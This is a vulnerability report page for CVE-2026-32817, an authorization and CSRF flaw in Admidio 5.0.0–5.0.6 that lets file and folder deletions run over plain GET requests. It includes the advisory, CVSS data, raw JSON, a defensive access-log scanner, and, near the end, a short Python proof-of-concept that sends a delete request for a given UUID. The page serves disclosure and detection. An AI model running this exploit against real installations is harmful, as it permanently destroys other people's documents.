Security Vulnerability Report
CVE-2026-32817 CVSS 9.1 CRITICAL

CVE-2026-32817

Published: 2026-03-20 02:16:35
Last Modified: 2026-03-23 13:16:30

Description

Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the documents and files module does not verify whether the current user has permission to delete folders or files. The folder_delete and file_delete action handlers in modules/documents-files.php only perform a VIEW authorization check (getFolderForDownload / getFileForDownload) before calling delete(), and they never validate a CSRF token. Because the target UUIDs are read from $_GET, deletion can be triggered by a plain HTTP GET request. When the module is in public mode (documents_files_module_enabled = 1) and a folder is marked public (fol_public = true), an unauthenticated attacker can permanently destroy the entire document library. Even when the module requires login, any user with view-only access can delete content they are only permitted to read. This issue has been fixed in version 5.0.7.
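Because the advisory states that the delete handlers are reachable through a plain GET and read their target UUIDs from $_GET, the most useful thing a defender can do on an affected installation (besides upgrading to 5.0.7) is to look for delete actions that arrived as GET requests in the web server access log. The following scanner is an added example written for this page; it is not Admidio code and not part of the advisory. It assumes an Apache/nginx "combined" log format, and the sample lines, query parameter names and UUID values in it are constructed. The match is on the action names the advisory gives (folder_delete / file_delete) appearing as a query-string value on a request to modules/documents-files.php, so it does not depend on guessing the parameter name. The "no Referer" heuristic is an added assumption: a scripted or cross-site request typically carries none.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Apache "combined" format.
# IPs are documentation ranges, UUIDs and parameter names are made up for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Mar/2026:03:12:01 +0000] "GET /admidio/modules/documents-files.php?mode=file_delete&uuid=CONSTRUCTED-UUID-1 HTTP/1.1" 200 512 "-" "curl/8.4.0"
203.0.113.7 - - [20/Mar/2026:03:12:05 +0000] "GET /admidio/modules/documents-files.php?mode=folder_delete&uuid=CONSTRUCTED-UUID-2 HTTP/1.1" 302 0 "-" "curl/8.4.0"
198.51.100.22 - - [20/Mar/2026:03:15:44 +0000] "GET /admidio/modules/documents-files.php?mode=view&uuid=CONSTRUCTED-UUID-1 HTTP/1.1" 200 20480 "https://example.org/admidio/" "Mozilla/5.0"
198.51.100.22 - - [20/Mar/2026:03:16:02 +0000] "POST /admidio/modules/documents-files.php?mode=file_delete&uuid=CONSTRUCTED-UUID-1 HTTP/1.1" 302 0 "https://example.org/admidio/modules/documents-files.php" "Mozilla/5.0"
192.0.2.9 - - [20/Mar/2026:03:20:10 +0000] "GET /admidio/modules/profile.php?user_uuid=CONSTRUCTED-UUID-3 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Apache/nginx "combined" format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Action names taken from the advisory text; the module path is the one it names.
DELETE_ACTIONS = ("folder_delete", "file_delete")
MODULE_PATH = "modules/documents-files.php"


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a finding for a delete action against the documents module, else None."""
    parts = urlsplit(entry["target"])
    if not parts.path.endswith(MODULE_PATH):
        return None
    # Look at every query-string value so the parameter name does not matter.
    values = {v for vs in parse_qs(parts.query).values() for v in vs}
    action = next((a for a in DELETE_ACTIONS if a in values), None)
    if action is None:
        return None
    reasons = []
    if entry["method"] == "GET":
        # A destructive action reachable via GET is the pattern CVE-2026-32817 describes.
        reasons.append("delete action via GET (CVE-2026-32817 pattern)")
    if entry["referer"] in ("", "-"):
        # Heuristic (assumption): scripted or cross-site requests usually carry no Referer.
        reasons.append("no Referer: possible scripted or cross-site request")
    return {
        "ip": entry["ip"],
        "ts": entry["ts"],
        "method": entry["method"],
        "action": action,
        "status": int(entry["status"]),
        "severity": "high" if entry["method"] == "GET" else "info",
        "reasons": reasons,
    }


def scan(log_text):
    """Run the classifier over every line of a log and return the findings in order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry)
        if finding is not None:
            findings.append(finding)
    return findings


def summarize(findings):
    """Count high-severity (GET-based) delete actions per source IP."""
    counts = {}
    for f in findings:
        if f["severity"] == "high":
            counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['severity']:<4} {f['ts']} {f['ip']} {f['method']} {f['action']} -> {f['status']} {f['reasons']}")
    print("GET-based deletes per IP:", summarize(results))
```

Run against the real access log by replacing SAMPLE_LOG with the file contents. A POST delete with a same-origin Referer is reported at "info" level only, since that is what a CSRF-protected form submission would look like; every GET delete is reported as "high" regardless of response status, because the advisory says a 200 or a redirect can both follow a successful deletion on affected versions, so status alone is not evidence that nothing happened.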

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* - VULNERABLE
Admidio 5.0.0
Admidio 5.0.1
Admidio 5.0.2
Admidio 5.0.3
Admidio 5.0.4
Admidio 5.0.5
Admidio 5.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# POC for CVE-2026-32817
# Description: Delete a file/folder via plain HTTP GET request due to missing
# permission checks and CSRF protection.

def exploit(target_url, target_uuid):
    # The endpoint is modules/documents-files.php
    # Vulnerable parameters are derived from the description (folder_delete/file_delete actions)
    # This example demonstrates the file_delete action
    full_url = f"{target_url}/modules/documents-files.php"

    # Parameters based on the vulnerability description
    params = {
        'mode': 'file_delete',  # or 'folder_delete'
        'uuid': target_uuid     # The UUID of the target file/folder
    }

    try:
        response = requests.get(full_url, params=params, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent to {full_url}")
            print(f"[+] Status Code: {response.status_code}")
            print("[+] Check if the file/folder has been deleted.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target and a valid UUID obtained via reconnaissance
    target = "http://example.com/admidio"
    uuid = "VALID_UUID_HERE"
    exploit(target, uuid)

References

https://github.com/Admidio/admidio/security/advisories/GHSA-rmpj-3x5m-9m5f (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32817", "sourceIdentifier": "[email protected]", "published": "2026-03-20T02:16:35.380", "lastModified": "2026-03-23T13:16:30.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the documents and files module does not verify whether the current user has permission to delete folders or files. The folder_delete and file_delete action handlers in modules/documents-files.php only perform a VIEW authorization check (getFolderForDownload / getFileForDownload) before calling delete(), and they never validate a CSRF token. Because the target UUIDs are read from $_GET, deletion can be triggered by a plain HTTP GET request. When the module is in public mode (documents_files_module_enabled = 1) and a folder is marked public (fol_public = true), an unauthenticated attacker can permanently destroy the entire document library. Even when the module requires login, any user with view-only access can delete content they are only permitted to read. This issue has been fixed in version 5.0.7."}, {"lang": "es", "value": "Admidio es una solución de gestión de usuarios de código abierto. En las versiones 5.0.0 a 5.0.6, el módulo de documentos y archivos no verifica si el usuario actual tiene permiso para eliminar carpetas o archivos. Los manejadores de acciones folder_delete y file_delete en modules/documents-files.php solo realizan una verificación de autorización de VISTA (getFolderForDownload / getFileForDownload) antes de llamar a delete(), y nunca validan un token CSRF. Debido a que los UUID de destino se leen de $_GET, la eliminación puede ser activada por una solicitud HTTP GET simple. Cuando el módulo está en modo público (documents_files_module_enabled = 1) y una carpeta está marcada como pública (fol_public = true), un atacante no autenticado puede destruir permanentemente toda la biblioteca de documentos. Incluso cuando el módulo requiere inicio de sesión, cualquier usuario con acceso de solo lectura puede eliminar contenido que solo tiene permiso para leer. Este problema ha sido solucionado en la versión 5.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.7", "matchCriteriaId": "4020E2FE-8E51-405F-86CB-DAAFBA7FD9B3"}]}]}], "references": [{"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-rmpj-3x5m-9m5f", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}